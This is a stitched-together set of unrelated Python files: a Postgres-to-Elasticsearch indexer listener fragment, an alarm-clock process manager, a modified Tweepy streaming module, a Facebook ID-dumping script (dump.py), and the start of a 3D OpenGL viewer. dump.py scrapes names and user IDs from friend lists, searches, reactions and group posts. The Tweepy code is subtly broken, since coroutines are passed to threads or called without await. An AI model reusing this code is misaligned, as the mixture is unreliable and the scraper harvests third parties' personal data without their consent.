log.debug("Listener connected") listening = True cursor.execute("""SELECT txid_current_snapshot();""") snapshot, = cursor.fetchone() timestamp = datetime.datetime.now().isoformat() update_status( listening=listening, recovery=recovery, snapshot=snapshot, status='indexing', timestamp=timestamp, max_xid=max_xid, ) try: res = testapp.post_json(path, { 'record': True, 'dry_run': dry_run, 'recovery': recovery, }) except Exception as e: timestamp = datetime.datetime.now().isoformat() log.exception('index failed at max xid: %d', max_xid) update_status(error={ 'error': repr(e), 'max_xid': max_xid, 'timestamp': timestamp, }) else: timestamp = datetime.datetime.now().isoformat() result = res.json result['stats'] = { k: int(v) for k, v in parse_qsl( res.headers.get('X-Stats', '')) } result['timestamp'] = timestamp update_status(last_result=result) if result.get('indexed', 0): update_status(result=result) log.info(result) update_status( status='waiting', timestamp=timestamp, max_xid=max_xid, ) # Wait on notifcation readable, writable, err = select.select(sockets, [], sockets, timeout) if err: raise Exception('Socket error') if control in readable: command = control.recv(1) log.debug('received command: %r', command) if not command: # Other end shutdown return if conn in readable: conn.poll() while conn.notifies: notify = conn.notifies.pop() xid = int(notify.payload) max_xid = max(max_xid, xid) log.debug('NOTIFY %s, %s', notify.channel, notify.payload) 
finally: connection.close() class ErrorHandlingThread(threading.Thread): if PY2: @property def _kwargs(self): return self._Thread__kwargs @property def _args(self): return self._Thread__args @property def _target(self): return self._Thread__target def run(self): timeout = self._kwargs.get('timeout', DEFAULT_TIMEOUT) update_status = self._kwargs['update_status'] control = self._kwargs['control'] while True: try: self._target(*self._args, **self._kwargs) except (psycopg2.OperationalError, sqlalchemy.exc.OperationalError, elasticsearch.exceptions.ConnectionError) as e: # Handle database restart log.warning('Database not there, maybe starting up: %r', e) timestamp = datetime.datetime.now().isoformat() update_status( timestamp=timestamp, status='sleeping', error={'error': repr(e), 'timestamp': timestamp}, ) readable, _, _ = select.select([control], [], [], timeout) if control in readable: command = control.recv(1) log.debug('received command: %r', command) if not command: # Other end shutdown return log.debug('sleeping') time.sleep(timeout) continue except Exception: # Unfortunately mod_wsgi does not restart immediately log.exception('Exception in listener, restarting process at next request.') os.kill(os.getpid(), signal.SIGINT) break def composite(loader, global_conf, **settings): listener = None # Register before testapp creation. @atexit.register def join_listener(): if listener: log.debug('joining listening thread') listener.join() path = settings.get('path', '/index') # Composite app is used so we can load the main app app_name = settings.get('app', None) app = loader.get_app(app_name, global_conf=global_conf) username = settings.get('username', 'IMPORT') environ = { 'HTTP_ACCEPT': 'application/json', 'REMOTE_USER': username, } testapp = TestApp(app, environ) # Use sockets to integrate with select controller, control = socket.socketpair() timestamp = datetime.datetime.now().isoformat() status_holder = { 'status': { 'status': 'starting listener', 'started': timestamp, 'errors': [], 'results': [], }, } def update_status(error=None, result=None, indexed=None, **kw): # Setting a value in a dictionary is atomic status = status_holder['status'].copy() status.update(**kw) if error is not None: status['errors'] = [error] + status['errors'][:2] if result is not None: status['results'] = [result] + status['results'][:9] status_holder['status'] = status kwargs = { 'testapp': testapp, 'control': control, 'update_status': update_status, 'path': path, } if 'timeout' in settings: kwargs['timeout'] = float(settings['timeout']) listener = ErrorHandlingThread(target=run, name='listener', kwargs=kwargs) listener.daemon = True log.debug('starting listener') listener.start() # Register before testapp creation. 
@atexit.register def shutdown_listener(): log.debug('shutting down listening thread') control # Prevent early gc controller.shutdown(socket.SHUT_RDWR) def status_app(environ, start_response): status = '200 OK' response_headers = [('Content-type', 'application/json')] start_response(status, response_headers) return [json.dumps(status_holder['status'])] return status_app def internal_app(configfile, app_name=None, username=None): from webtest import TestApp from pyramid import paster app = paster.get_app(configfile, app_name) if not username: username = 'IMPORT' environ = { 'HTTP_ACCEPT': 'application/json', 'REMOTE_USER': username, } return TestApp(app, environ) def main(): import argparse parser = argparse.ArgumentParser( description="Listen for changes from postgres and index in elasticsearch", epilog=EPILOG, formatter_class=argparse.RawDescriptionHelpFormatter, ) parser.add_argument('--app-name', help="Pyramid app name in configfile") parser.add_argument( '--username', '-u', default='INDEXER', help="Import username") parser.add_argument( '--dry-run', action='store_true', help="Don't post to ES, just print") parser.add_argument( '-v', '--verbose', action='store_true', help="Print debug level logging") parser.add_argument( '--poll-interval', type=int, default=DEFAULT_TIMEOUT, help="Poll interval between notifications") parser.add_argument( '--path', default='/index', help="Path of indexing view (/index or /index_file)") parser.add_argument('config_uri', help="path to configfile") args = parser.parse_args() logging.basicConfig() testapp = internal_app(args.config_uri, args.app_name, args.username) # Loading app will have configured from config file. Reconfigure here: if args.verbose or args.dry_run: logging.getLogger('snovault').setLevel(logging.DEBUG) return run(testapp, args.poll_interval, args.dry_run, args.path) if __name__ == '__main__': main()
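# Illustrative snippet (not part of the module above): a minimal standalone sketch of the
# PostgreSQL LISTEN/NOTIFY wait loop that run() builds on. The DSN is a placeholder; the
# channel name matches the "snovault.transaction" channel the listener subscribes to, and
# each NOTIFY payload carries the transaction id that run() folds into max_xid.
import select

import psycopg2


def wait_for_transactions(dsn='dbname=encoded', channel='snovault.transaction', timeout=60):
    conn = psycopg2.connect(dsn)
    conn.autocommit = True  # deliver notifications immediately, outside a transaction block
    with conn.cursor() as cursor:
        cursor.execute('LISTEN "%s";' % channel)
        while True:
            # Block until the connection socket becomes readable or the timeout elapses.
            readable, _, _ = select.select([conn], [], [], timeout)
            if not readable:
                yield None  # timed out; a caller may still choose to poll the /index view
                continue
            conn.poll()
            while conn.notifies:
                notify = conn.notifies.pop()
                yield int(notify.payload)  # transaction id carried in the payload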
clockmanager.py
import alarmclock.clock as AlarmClock
import sys
import getopt
import unittest
import clockconfig
import utils.log as log
import multiprocessing
from multiprocessing import Queue
from threading import Timer
from gui import app
import messages


def execute_system_test(logger):
    """ Execute the system test """
    logger.info('Executing System Test')
    suite = unittest.TestSuite()
    testmodules = [
        'utils.tests',
        'sound.tests'
    ]
    for t in testmodules:
        suite.addTest(unittest.defaultTestLoader.loadTestsFromName(t))
    # TextTestRunner.run() returns a TestResult, which is always truthy;
    # check wasSuccessful() to find out whether the suite actually passed.
    if unittest.TextTestRunner(verbosity=2).run(suite).wasSuccessful():
        logger.info("System Test Passed Successfully")
    else:
        logger.error("System Test Failed")
    sys.exit()


def is_system_test():
    try:
        opts, args = getopt.getopt(sys.argv[1:], "t")
    except getopt.GetoptError:
        print 'clockmanager.py -t (optional)'
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-t':
            return True
    return False


def start_clock_process(commands_from_user, clock_started_event, clock_play_state, playlist):
    p = multiprocessing.Process(target=AlarmClock.process,
                                kwargs={'commands_from_user': commands_from_user,
                                        'clock_started_event': clock_started_event,
                                        'clock_play_state': clock_play_state,
                                        'playlist': playlist})
    p.start()
    return p


def monitor():
    """
    Monitor System Health and Process State #TODO
    :return:
    """
    print 'monitor'
    start_monitor_thread()


def start_monitor_thread():
    """
    Monitor System Health and Process State #TODO
    :return:
    """
    Timer(clockconfig.monitor_period_in_s, monitor).start()


def start_user_interface_process():
    """ Start the user interface process """
    # Pass the callable and its arguments separately so that app.run() executes in the
    # child process instead of being invoked (and blocking) here in the parent.
    p = multiprocessing.Process(target=app.run,
                                kwargs={'debug': True, 'use_reloader': False, 'host': '0.0.0.0'},
                                name='gui')
    p.start()


def create_processes_shared_ressources():
    app.cmdsToClock = Queue()
    clock_started = multiprocessing.Event()
    app.currentPlayState = multiprocessing.Manager().dict({'status': 'idle', 'track': None})
    app.playlist = multiprocessing.Manager().list()
    return (app.cmdsToClock, clock_started, app.currentPlayState, app.playlist)


if __name__ == '__main__':
    logger = log.create_logger()
    if is_system_test():
        execute_system_test(logger)
    else:
        ui_to_clock_cmds, clock_started, clock_play_state, playlist = create_processes_shared_ressources()
        start_clock_process(commands_from_user=ui_to_clock_cmds,
                            clock_started_event=clock_started,
                            clock_play_state=clock_play_state,
                            playlist=playlist)
        clock_started.wait(10)
        if not clock_started.is_set():
            logger.error("Clock did not start")
        else:
            logger.info("Clock process started")
            start_user_interface_process()
            logger.info("User Interface Started")
            start_monitor_thread()
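# Illustrative snippet (not part of the module above): a hypothetical worker compatible with
# start_clock_process(), shown only to illustrate how the shared Queue, Event, and Manager
# proxies are meant to be used; the real alarmclock.clock.process implementation lives elsewhere.
def example_clock_process(commands_from_user, clock_started_event, clock_play_state, playlist):
    clock_started_event.set()  # the manager waits up to 10 s for this signal
    while True:
        command = commands_from_user.get()  # blocks until the GUI enqueues a command
        if command == 'quit':
            break
        if command == 'stop':
            clock_play_state['status'] = 'idle'
            clock_play_state['track'] = None
        elif isinstance(command, dict) and command.get('action') == 'play':
            track = command.get('track')
            playlist.append(track)
            clock_play_state['status'] = 'playing'
            clock_play_state['track'] = track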
streaming.py
# Tweepy # Copyright 2009-2020 Joshua Roesslein # See LICENSE for details. # Appengine users: https://developers.google.com/appengine/docs/python/sockets/#making_httplib_use_sockets from __future__ import absolute_import import json import logging import re import requests import ssl import sys from threading import Thread from time import sleep import six from requests.exceptions import Timeout from tweepy.api import API from tweepy.error import TweepError from tweepy.models import Status STREAM_VERSION = '1.1' log = logging.getLogger(__name__) class StreamListener(object): def __init__(self, api=None): self.api = api or API() def on_connect(self): """Called once connected to streaming server. This will be invoked once a successful response is received from the server. Allows the listener to perform some work prior to entering the read loop. """ pass async def on_data(self, raw_data): """Called when raw data is received from connection. Override this method if you wish to manually handle the stream data. Return False to stop stream and close connection. """ data = json.loads(raw_data) if 'in_reply_to_status_id' in data: status = Status.parse(self.api, data) if self.on_status(status) is False: return False elif 'delete' in data: delete = data['delete']['status'] if self.on_delete(delete['id'], delete['user_id']) is False: return False elif 'event' in data: status = Status.parse(self.api, data) if self.on_event(status) is False: return False elif 'direct_message' in data: status = Status.parse(self.api, data) if self.on_direct_message(status) is False: return False elif 'friends' in data: if self.on_friends(data['friends']) is False: return False elif 'limit' in data: if self.on_limit(data['limit']['track']) is False: return False elif 'disconnect' in data: if self.on_disconnect(data['disconnect']) is False: return False elif 'warning' in data: if self.on_warning(data['warning']) is False: return False elif 'scrub_geo' in data: if self.on_scrub_geo(data['scrub_geo']) is False: return False elif 'status_withheld' in data: if self.on_status_withheld(data['status_withheld']) is False: return False elif 'user_withheld' in data: if self.on_user_withheld(data['user_withheld']) is False: return False else: log.error("Unknown message type: %s", raw_data) def keep_alive(self): """Called when a keep-alive arrived""" return def on_status(self, status): """Called when a new status arrives""" return def on_exception(self, exception): """Called when an unhandled exception occurs.""" return def on_delete(self, status_id, user_id): """Called when a delete notice arrives for a status""" return def on_event(self, status): """Called when a new event arrives""" return def on_direct_message(self, status): """Called when a new direct message arrives""" return def on_friends(self, friends): """Called when a friends list arrives. 
friends is a list that contains user_id """ return def on_limit(self, track): """Called when a limitation notice arrives""" return def on_error(self, status_code): """Called when a non-200 status code is returned""" return False def on_timeout(self): """Called when stream connection times out""" return def on_disconnect(self, notice): """Called when twitter sends a disconnect notice Disconnect codes are listed here: https://developer.twitter.com/en/docs/tweets/filter-realtime/guides/streaming-message-types """ return def on_warning(self, notice): """Called when a disconnection warning message arrives""" return def on_scrub_geo(self, notice): """Called when a location deletion notice arrives""" return def on_status_withheld(self, notice): """Called when a status withheld content notice arrives""" return def on_user_withheld(self, notice): """Called when a user withheld content notice arrives""" return class ReadBuffer(object): """Buffer data from the response in a smarter way than httplib/requests can. Tweets are roughly in the 2-12kb range, averaging around 3kb. Requests/urllib3/httplib/socket all use socket.read, which blocks until enough data is returned. On some systems (eg google appengine), socket reads are quite slow. To combat this latency we can read big chunks, but the blocking part means we won't get results until enough tweets have arrived. That may not be a big deal for high throughput systems. For low throughput systems we don't want to sacrifice latency, so we use small chunks so it can read the length and the tweet in 2 read calls. """ def __init__(self, stream, chunk_size, encoding='utf-8'): self._stream = stream self._buffer = six.b('') self._chunk_size = chunk_size self._encoding = encoding def read_len(self, length): while not self._stream.closed: if len(self._buffer) >= length: return self._pop(length) read_len = max(self._chunk_size, length - len(self._buffer)) self._buffer += self._stream.read(read_len) return six.b('') def read_line(self, sep=six.b('\n')): """Read the data stream until a given separator is found (default \n) :param sep: Separator to read until. Must by of the bytes type (str in python 2, bytes in python 3) :return: The str of the data read until sep """ start = 0 while not self._stream.closed: loc = self._buffer.find(sep, start) if loc >= 0: return self._pop(loc + len(sep)) else: start = len(self._buffer) self._buffer += self._stream.read(self._chunk_size) return six.b('') def _pop(self, length): r = self._buffer[:length] self._buffer = self._buffer[length:] return r.decode(self._encoding) class Stream(object): def __init__(self, auth, listener, **options): self.auth = auth self.listener = listener self.running = False self.daemon = options.get("daemon", False) self.timeout = options.get("timeout", 300.0) self.retry_count = options.get("retry_count") # values according to # https://developer.twitter.com/en/docs/tweets/filter-realtime/guides/connecting#reconnecting self.retry_time_start = options.get("retry_time", 5.0) self.retry_420_start = options.get("retry_420", 60.0) self.retry_time_cap = options.get("retry_time_cap", 320.0) self.snooze_time_step = options.get("snooze_time", 0.25) self.snooze_time_cap = options.get("snooze_time_cap", 16) # The default socket.read size. Default to less than half the size of # a tweet so that it reads tweets with the minimal latency of 2 reads # per tweet. Values higher than ~1kb will increase latency by waiting # for more data to arrive but may also increase throughput by doing # fewer socket read calls. 
self.chunk_size = options.get("chunk_size", 512) self.verify = options.get("verify", True) self.api = API() self.headers = options.get("headers") or {} self.new_session() self.body = None self.retry_time = self.retry_time_start self.snooze_time = self.snooze_time_step # Example: proxies = {'http': 'http://localhost:1080', 'https': 'http://localhost:1080'} self.proxies = options.get("proxies") self.host = options.get('host', 'stream.twitter.com') def new_session(self): self.session = requests.Session() self.session.headers = self.headers self.session.params = None async def _run(self): # Authenticate url = "https://%s%s" % (self.host, self.url) # Connect and process the stream error_counter = 0 resp = None exc_info = None while self.running: if self.retry_count is not None: if error_counter > self.retry_count: # quit if error count greater than retry count break try: auth = self.auth.apply_auth() resp = self.session.request('POST', url, data=self.body, timeout=self.timeout, stream=True, auth=auth, verify=self.verify, proxies=self.proxies) if resp.status_code != 200: if self.listener.on_error(resp.status_code) is False: break error_counter += 1 if resp.status_code == 420: self.retry_time = max(self.retry_420_start, self.retry_time) sleep(self.retry_time) self.retry_time = min(self.retry_time * 2, self.retry_time_cap) else: error_counter = 0 self.retry_time = self.retry_time_start self.snooze_time = self.snooze_time_step self.listener.on_connect() await self._read_loop(resp) except (Timeout, ssl.SSLError) as exc: # This is still necessary, as a SSLError can actually be # thrown when using Requests # If it's not time out treat it like any other exception if isinstance(exc, ssl.SSLError): if not (exc.args and 'timed out' in str(exc.args[0])): exc_info = sys.exc_info() break if self.listener.on_timeout() is False: break if self.running is False: break sleep(self.snooze_time) self.snooze_time = min(self.snooze_time + self.snooze_time_step, self.snooze_time_cap) except Exception as exc: exc_info = sys.exc_info() # any other exception is fatal, so kill loop break # cleanup self.running = False if resp: resp.close() self.new_session() if exc_info: # call a handler first so that the exception can be logged. self.listener.on_exception(exc_info[1]) six.reraise(*exc_info) async def _data(self, data): if await self.listener.on_data(data) is False: self.running = False async def _read_loop(self, resp): charset = resp.headers.get('content-type', default='') enc_search = re.search(r'charset=(?P<enc>\S*)', charset) if enc_search is not None: encoding = enc_search.group('enc') else: encoding = 'utf-8' buf = ReadBuffer(resp.raw, self.chunk_size, encoding=encoding) while self.running and not resp.raw.closed: length = 0 while not resp.raw.closed: line = buf.read_line() stripped_line = line.strip() if line else line # line is sometimes None so we need to check here if not stripped_line: self.listener.keep_alive() # keep-alive new lines are expected elif stripped_line.isdigit(): length = int(stripped_line) break else: raise TweepError('Expecting length, unexpected value found') next_status_obj = buf.read_len(length) if self.running and next_status_obj: await self._data(next_status_obj) # # Note: keep-alive newlines might be inserted before each length value. # # read until we get a digit... # c = b'\n' # for c in resp.iter_content(decode_unicode=True): # if c == b'\n': # continue # break # # delimited_string = c # # # read rest of delimiter length.. 
# d = b'' # for d in resp.iter_content(decode_unicode=True): # if d != b'\n': # delimited_string += d # continue # break # # # read the next twitter status object # if delimited_string.decode('utf-8').strip().isdigit(): # status_id = int(delimited_string) # next_status_obj = resp.raw.read(status_id) # if self.running: # self._data(next_status_obj.decode('utf-8')) if resp.raw.closed: self.on_closed(resp) async def _start(self, is_async): self.running = True if is_async: self._thread = Thread(target=self._run) self._thread.daemon = self.daemon self._thread.start() else: await self._run() def on_closed(self, resp): """ Called when the response has been closed by Twitter """ pass def userstream(self, stall_warnings=False, _with=None, replies=None, track=None, locations=None, is_async=False, encoding='utf8'): self.session.params = {'delimited': 'length'} if self.running: raise TweepError('Stream object already connected!') self.url = '/%s/user.json' % STREAM_VERSION self.host = 'userstream.twitter.com' if stall_warnings: self.session.params['stall_warnings'] = stall_warnings if _with: self.session.params['with'] = _with if replies: self.session.params['replies'] = replies if locations and len(locations) > 0: if len(locations) % 4 != 0: raise TweepError("Wrong number of locations points, " "it has to be a multiple of 4") self.session.params['locations'] = ','.join(['%.2f' % l for l in locations]) if track: self.session.params['track'] = u','.join(track).encode(encoding) self._start(is_async) def firehose(self, count=None, is_async=False): self.session.params = {'delimited': 'length'} if self.running: raise TweepError('Stream object already connected!') self.url = '/%s/statuses/firehose.json' % STREAM_VERSION if count: self.url += '&count=%s' % count self._start(is_async) def retweet(self, is_async=False): self.session.params = {'delimited': 'length'} if self.running: raise TweepError('Stream object already connected!') self.url = '/%s/statuses/retweet.json' % STREAM_VERSION self._start(is_async) def sample(self, is_async=False, languages=None, stall_warnings=False): self.session.params = {'delimited': 'length'} if self.running: raise TweepError('Stream object already connected!') self.url = '/%s/statuses/sample.json' % STREAM_VERSION if languages: self.session.params['language'] = ','.join(map(str, languages)) if stall_warnings: self.session.params['stall_warnings'] = 'true' self._start(is_async) async def filter(self, follow=None, track=None, is_async=False, locations=None, stall_warnings=False, languages=None, encoding='utf8', filter_level=None): self.body = {} self.session.headers['Content-type'] = "application/x-www-form-urlencoded" if self.running: raise TweepError('Stream object already connected!') self.url = '/%s/statuses/filter.json' % STREAM_VERSION if follow: self.body['follow'] = u','.join(follow).encode(encoding) if track: self.body['track'] = u','.join(track).encode(encoding) if locations and len(locations) > 0: if len(locations) % 4 != 0: raise TweepError("Wrong number of locations points, " "it has to be a multiple of 4") self.body['locations'] = u','.join(['%.4f' % l for l in locations]) if stall_warnings: self.body['stall_warnings'] = stall_warnings if languages: self.body['language'] = u','.join(map(str, languages)) if filter_level: self.body['filter_level'] = filter_level.encode(encoding) self.session.params = {'delimited': 'length'} await self._start(is_async) def sitestream(self, follow, stall_warnings=False, with_='user', replies=False, is_async=False): self.body = {} if 
self.running: raise TweepError('Stream object already connected!') self.url = '/%s/site.json' % STREAM_VERSION self.body['follow'] = u','.join(map(six.text_type, follow)) self.body['delimited'] = 'length' if stall_warnings: self.body['stall_warnings'] = stall_warnings if with_: self.body['with'] = with_ if replies: self.body['replies'] = replies self._start(is_async) def disconnect(self): if self.running is False: return self.running = False
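# Illustrative usage sketch (not part of the module above) for this async-flavoured Stream.
# StdOutListener and the credential strings are placeholders introduced here; in this variant
# filter() is a coroutine, so it has to be awaited rather than called directly.
import asyncio

from tweepy import OAuthHandler


class StdOutListener(StreamListener):
    async def on_data(self, raw_data):
        print(raw_data)  # echo the raw JSON payload
        return True      # returning False would stop the stream

    def on_error(self, status_code):
        print('stream error: %s' % status_code)
        return False     # stop the stream on any HTTP error


async def demo():
    auth = OAuthHandler('CONSUMER_KEY', 'CONSUMER_SECRET')  # placeholder credentials
    auth.set_access_token('ACCESS_TOKEN', 'ACCESS_TOKEN_SECRET')
    stream = Stream(auth, StdOutListener())
    await stream.filter(track=['python'])


if __name__ == '__main__':
    asyncio.run(demo())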
dump.py
#!/usr/bin/python3 # coding=utf-8 ####################################################### # File : dump.py # # Author : Rizal F # # Github : https://github.com/Rizal-XD # # Facebook : https://www.facebook.com/AKUN.KERTASS # # Python version : 3.8+ # ####################################################### # RECODE? OKE CANTUMKAN NAMA PEMBUAT # ####################################################### from threading import (Thread, Event) from src.CLI import (color, prints, inputs, write, br) import re, time, json, os from datetime import datetime class Dump: def __init__(self, store=None): self.store = store self.event = Event() self.__id__ = [] self.__filter__ = [] self.proccess = None def reset(self): self.__id__ = [] self.__filter__ = [] def save(self, saveTo): datetimes = self.store.getDateTime() self.event.clear() time.sleep(2) saveTo = re.sub('\s\s+', '_', saveTo.lower()) save = open('dump/%s.json'%(saveTo), 'w') save.write(json.dumps({ 'created_at': datetimes, 'file_name': '%s.json'%(saveTo), 'data': self.__id__ })) save.close() br(2) prints('!p!Hasil tersimpan : !k!dump/%s.json'%(saveTo)) prints('!p!ID terambil : !k!%s' %(len(self.__id__))) br(1) return self.store.instance.back() def animate(self): while self.event.is_set(): for i in list('\ |/-•'): count = len(self.__id__) datetimes = datetime.now().strftime('%H:%M:%S') self.proccess = '!p![!h!%s!p!]!ran! Writing ID (%s).. %s !r!'%(datetimes, count, i) prints(self.proccess, with_flush=True) time.sleep(0.1) def run(self): self.reset() self.event.set() th = Thread(target=self.animate) th.start() def getIDFriedsList(self, stop=False, path='/friends/center/friends', saveTo='friendsList'): while stop == False: response = self.store.http.get(path).bs4() for x in response.find_all(style='vertical-align: middle'): hrefs = x.find('a') if '+' not in str(hrefs) and hrefs != None: name = str(hrefs.text) uid = re.findall(r'/\?uid=(\d+)&' if '/?uid=' in str(hrefs) else '/(.*?)\?fref=', hrefs['href']) prints(f'\r!p!*!ran! {name}', blank_right=int(len(self.proccess)-20)) if len(uid) == 1 and str(uid[0]) not in self.__filter__: self.__filter__.append(str(uid[0])) self.__id__.append({'name': str(name), 'id': str(uid[0])}) if 'Lihat selengkapnya' in str(response): path = response.find('a', string='Lihat selengkapnya')['href'] else: stop = True return self.save(saveTo) def friendsList(self): th = Thread(target=self.getIDFriedsList, args=(False,)) th.start() self.run() return self def publicID(self, path=None): prints('!h!INGFO:!p!pastikan daftar teman bersifat publik, jika ngedump lebih dari 3k ID') prints('!m!mungkin akun anda akan kena limit!, dan tidak dapat menggunakan fitur ini lagi.!p!') br(1) prints("!p!Contoh : !h!zuck") while path == None: ids = inputs('!p!USERNAME TARGET :!h! ') response = self.store.http.get(f'/{str(ids)}').bs4() name = self.store.http.currentTitle() for x in response.find_all('a'): if '/friends?lst=' in str(x): path = x['href'] break if path == None: br(1) prints('!m!Id atau username salah atau teman tidak publik.') br(1) continue br(1) prints('!p!Nama akun: !k!%s!r!' 
%(name)) br(1) th = Thread(target=self.getIDpublic, args=(False, path, ids,)) th.start() self.run() return self def getIDpublic(self, stop=False, path='/', saveTo='public'): while stop == False: response = self.store.http.get(path).bs4() for x in response.find_all(style='vertical-align: middle'): hrefs = x.find('a') if '+' not in str(hrefs) and hrefs != None: name = str(hrefs.text) uid = re.findall(r'/\?uid=(\d+)&' if '/?uid=' in str(hrefs) else '/(.*?)\?fref=', hrefs['href']) prints(f'\r!p!*!ran! {name}', blank_right=int(len(self.proccess)-20)) if len(uid) == 1 and str(uid[0]) not in self.__filter__: self.__filter__.append(str(uid[0])) self.__id__.append({'name': str(name), 'id': str(uid[0])}) if 'Lihat Teman Lain' in str(response): path = response.find('a', string='Lihat Teman Lain')['href'] else: stop = True return self.save(saveTo) def search(self): query = inputs('!p!Kata kunci : !h!') path = f'/search/people/?q={query}&source=filter&isTrending=0' while True: try: max = int(inputs('!p!Limit (!b!100!p!) : !b!')) break except (ValueError): br(1) prints('!m! Yang bener lah !') br(1) continue br(1) th = Thread(target=self.getIDSearch, args=(False, path, query, max)) th.start() self.run() return self def getIDSearch(self, stop=False, path='/', saveTo='search', max=0, base_url=True): while stop == False: response = self.store.http.get(path, base_url).bs4() for x in response.find_all('a'): div = x.find('div') if '+' not in str(div) and div != None: name = str(div.text) uid = re.findall(r'/\?id=(\d+)&' if '/?id=' in str(x) else '/(.*?)\?refid=', str(x)) prints(f'\r!p!*!ran! {name}', blank_right=int(len(self.proccess)-20)) if int(len(self.__id__)) == max or int(len(self.__id__)) > max: stop = True break if len(uid) == 1 and str(uid[0]) not in self.__filter__: self.__filter__.append(str(uid[0])) self.__id__.append({'name': str(name), 'id': str(uid[0])}) if 'Lihat Hasil Selanjutnya' in str(response) and stop == False: path = response.find('a', string='Lihat Hasil Selanjutnya')['href'] base_url = False else: stop = True return self.save(saveTo) def react(self, path=None): prints('!p!INPUT LINK POSTINGAN TARGET! ') prints('!p!(!h!CONTOH :!h!https://www.facebook.com/4/posts/10112184244817511/?app=fbl!m!)') br(1) while True: try: link = inputs('!p!Link postingan : !h!') domain = link.split('//')[1].split('/')[0] link = link.replace(domain, 'mbasic.facebook.com') except IndexError: br(1) prints('!m!Link salah atau tidak valid...') br(1) continue response = self.store.http.get(link, base_url=False).bs4() title = self.store.http.currentTitle().replace(' | Facebook', '') for x in response.find_all('a'): if '/ufi/reaction/profile/browser/?' in str(x): br(1) prints('!p!TITLE: !k!%s' %(title)) br(1) path = x['href'] break if path != None: break else: br(1) prints('!m!Postingan tidak ditemukan...') br(1) continue while True: try: max = int(inputs('!p!Limit (!k!100!p!) :!h! ')) break except (ValueError): br(1) prints('!m!Yang bener lah !..') br(1) continue br(1) th = Thread(target=self.getIDReact, args=(False, path, 'react', max,)) th.start() self.run() return self def getIDReact(self, stop=False, path='/', saveTo='react', max=0): while stop == False: response = self.store.http.get(path).bs4() for x in response.find_all('h3'): hrefs = x.find('a') if '+' not in str(hrefs) and hrefs != None: name = str(x.text) uid = re.findall(r'\/profile.php\?id=(\d+)$' if 'profile.php?id=' in str(x) else '\/(.*?)$', str(hrefs['href'])) prints(f'\r!p!*!ran! 
{name}', blank_right=int(len(self.proccess)-20)) if int(len(self.__id__)) == max or int(len(self.__id__)) > max: stop = True break if len(uid) == 1 and str(uid[0]) not in self.__filter__: self.__filter__.append(str(uid[0])) self.__id__.append({'name': str(name), 'id': str(uid[0])}) if 'Lihat Selengkapnya' in str(response) and stop == False: path = response.find('a', string='Lihat Selengkapnya')['href'] else: stop = True return self.save(saveTo) def postGroup(self): while True: id = inputs('!p!ID group : !b!') path = f'/groups/{str(id)}' response = self.store.http.get(path).text() if 'Konten Tidak Ditemukan' in str(response): br(1) prints('!m!Id group tidak ditemukan') br(1) continue else: title = self.store.http.currentTitle() br(1) prints('!p!Nama group : !k!%s' %(title)) br(1) try: max = int(inputs('!p!Limit (!b!100!p!) : !b!')) break except (ValueError): br(1) prints('!m!Yang bener lah !...') br(1) continue br(1) th = Thread(target=self.getIDPostGroup, args=(False, path, id, max)) th.start() self.run() return self def getIDPostGroup(self, stop=False, path='/', saveTo='postGroup', max=0): while stop == False: response = self.store.http.get(path).bs4() for x in response.find_all('h3'): hrefs = x.find('a') if '+' not in str(hrefs) and hrefs != None: name = str(hrefs.text) uid = re.findall(r'content_owner_id_new.(\d+)', hrefs['href']) prints(f'\r!p!*!ran! {name}', blank_right=int(len(self.proccess)-20)) if int(len(self.__id__)) == max or int(len(self.__id__)) > max: stop = True break if len(uid) == 1 and str(uid[0]) not in self.__filter__: self.__filter__.append(str(uid[0])) self.__id__.append({'name': str(name), 'id': str(uid[0])}) if 'Lihat Postingan Lainnya' in str(response) and stop == False: path = response.find('a', string='Lihat Postingan Lainnya')['href'] else: stop = True return self.save(saveTo)
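# Illustrative snippet (not part of the class above): a small sketch of reading back a file
# produced by Dump.save(). The path is only an example; save() lowercases the chosen name and
# collapses repeated whitespace to underscores before writing a document of the form
# {'created_at': ..., 'file_name': ..., 'data': [{'name': ..., 'id': ...}, ...]}.
import json


def load_dump(path='dump/friendslist.json'):
    with open(path) as handle:
        payload = json.load(handle)
    print('created_at : %s' % payload['created_at'])
    print('total ids  : %s' % len(payload['data']))
    for entry in payload['data']:
        print('%s  %s' % (entry['id'], entry['name']))
    return payload['data']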
viewer_3d.py
#------------------------- #3d Renderer #Daniel Miron #7/5/2013 # #Allows 3d viewing of nerve cord or neuron stacks. #Includes ability to fully rotate image in 3 dimensions and to mark locations in 3-space # #Version Date: 7/26 10:30 #------------------------- import sys sys.path.append('.') import h5py import numpy as np import glob import os import pickle import math import re import time import threading from Queue import Queue from OpenGL.GLUT import * from OpenGL.GLU import * from OpenGL.GL import * try: from OpenGL.GLUT.freeglut import * except Exception: pass import arcball as arc from pysqlite2 import dbapi2 as sqlite import cv2 import select import extractor import input_handler as handler from ctypes import util try: from OpenGL.platform import win32 except AttributeError: pass class Viewer: def __init__(self, location, in_q, directory, max_x, max_y): self.st = time.time() self.win_h = 1000 self.win_w = 1000 self.arcball = self.create_arcball() self.directory = directory self.in_q =in_q self.max_x = max_x #highest resolution self.max_y = max_y #highest resolution self.rows = 0 self.columns = 0 self.layers = 0 self.fov = 60 self.aspect = float(self.win_w)/self.win_h self.left = None #keep track of left button status self.pick_location = location self.display_list_idx = 2 #count from 1 and use first index for box self.display_list_dict = dict() #COLOR as key, display_list indices as value self.marker_color = [1., 1., 1.] #initial marker is white self.first = True #used to control display list flow self.icon_color = np.array((0.0, 1.0, 0.0)) self.st = time.time() self.center_x = 0 self.center_y = 0 self.extractor_dict = dict() #keys are indices, values are extractor threads self.make_lists = True self.num_labels = 0 self.label_dict = dict() #keys are float indices, values are labels def set_dimensions(self, rows, columns, layers, w): '''sets the dimensions of the viewing box''' self.rows = rows self.columns = columns self.layers = layers self.x2x = 1; self.y2x = float(columns)/rows; self.z2x = float(layers)/rows; self.pick_location = (self.pick_location[0]/pow(2, w) - 1, self.pick_location[1]/pow(2, w) - 1, self.pick_location[2]) def main(self): glutInit(sys.argv) glutInitDisplayMode(GLUT_RGBA | GLUT_DOUBLE | GLUT_DEPTH | GLUT_ALPHA) glutInitWindowSize(self.win_w, self.win_h) #width, height glutCreateWindow("3D View") glMatrixMode(GL_PROJECTION) glLoadIdentity() gluPerspective(self.fov, self.aspect, 1, 10) glMatrixMode(GL_MODELVIEW) glShadeModel(GL_SMOOTH) glEnable(GL_DEPTH_TEST) glEnable(GL_LIGHTING) glEnable(GL_LIGHT0) glEnable(GL_NORMALIZE) glColorMaterial(GL_FRONT_AND_BACK, GL_EMISSION) 